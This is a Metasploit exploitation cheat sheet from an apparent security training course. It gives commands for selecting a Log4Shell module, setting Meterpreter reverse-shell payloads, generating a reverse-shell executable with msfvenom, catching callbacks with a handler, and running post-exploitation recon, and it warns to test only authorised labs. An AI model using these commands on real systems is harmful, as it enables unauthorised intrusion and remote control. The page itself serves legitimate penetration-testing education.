Skip to content

Cheat sheet — Exploitation with Metasploit

Companion to Module 04 — Exploitation Fundamentals · CC BY 4.0 — print it, pin it, share it.

Last reviewed: 2026-07

Only exploit systems you own or have explicit written permission to test. Use real CVEs against intentionally vulnerable targets (Vulhub, your own lab).

Starting up

msfdb init                        # initialise the backing Postgres DB (search/workspace speed)
msfconsole                        # launch the console
msfconsole -q                     # quiet (no banner)
db_status                         # confirm the DB is connected
workspace -a engagement           # isolate hosts/loot per engagement

Finding and selecting a module

search cve:2021-44228             # search by CVE
search type:exploit apache        # filter by module type + keyword
use exploit/multi/http/log4shell_header_injection
info                              # what it does, options, targets, references
show options                      # required/optional settings
show targets                      # target builds/architectures
show payloads                     # payloads compatible with THIS exploit

Setting options and payloads

set RHOSTS 10.0.0.5               # target(s)
set RPORT 8080
set LHOST 10.0.0.10               # YOUR IP for the callback (reverse shells)
set LPORT 4444
set payload linux/x64/meterpreter/reverse_tcp
setg LHOST 10.0.0.10             # set globally (persists across modules)
check                             # is the target vulnerable? (non-exploitative, when supported)

Reverse vs bind, staged vs stageless

# reverse: target connects OUT to you — escapes egress firewalls (the usual choice)
set payload windows/x64/meterpreter/reverse_tcp
# bind: target LISTENS, you connect in — only works if you can reach the listener
set payload windows/x64/meterpreter/bind_tcp
# staged (/) = tiny stub pulls the rest; stageless (_) = one self-contained blob
#   .../meterpreter/reverse_tcp   ← staged
#   .../meterpreter_reverse_tcp   ← stageless (more reliable through flaky links)

Firing and handling sessions

run            # or: exploit
exploit -j     # run as a background job (keeps the console free)
sessions       # list active sessions
sessions -i 1  # interact with session 1
background     # (Ctrl-Z) drop a session to background

Handlers, payloads without the exploit, and post

# generate a standalone payload (e.g. to drop via another vector)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444 -f exe -o shell.exe
use exploit/multi/handler          # catch a callback from a msfvenom payload
set payload windows/x64/meterpreter/reverse_tcp
run
# inside meterpreter:
sysinfo | getuid | shell           # host info · current user · drop to a native shell
run post/multi/recon/local_exploit_suggester   # find privesc paths

Gotchas worth remembering

  • Know which link broke. vulnerability → exploit → payload → session. When "run" fails, it's almost always the wrong target build or a payload/arch mismatch — not the exploit. check, show targets, and the right x64 vs x86 payload fix most failures.
  • LHOST is your address, RHOST is theirs. The single most common self-own is setting LHOST to the target — the reverse shell then calls a host that isn't listening and nothing comes back.
  • Reverse beats bind because of egress. Firewalls block inbound far more than outbound; a reverse shell rides the same NAT/egress asymmetry every network engineer knows. Reach for bind only when outbound is filtered but you can reach a listener.
  • Every exploit is loud. The crash, the spawned child process, the network callback — that's the exact T1190 telemetry the blue team hunts. Exploiting consciously means you can later tell a defender precisely what to look for.
  • The framework hides the details you need most. When it "just works" you learn nothing; when it doesn't, only understanding the chain saves you. Do the without-a-framework version once so the automated version isn't a black box.

Comments

Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).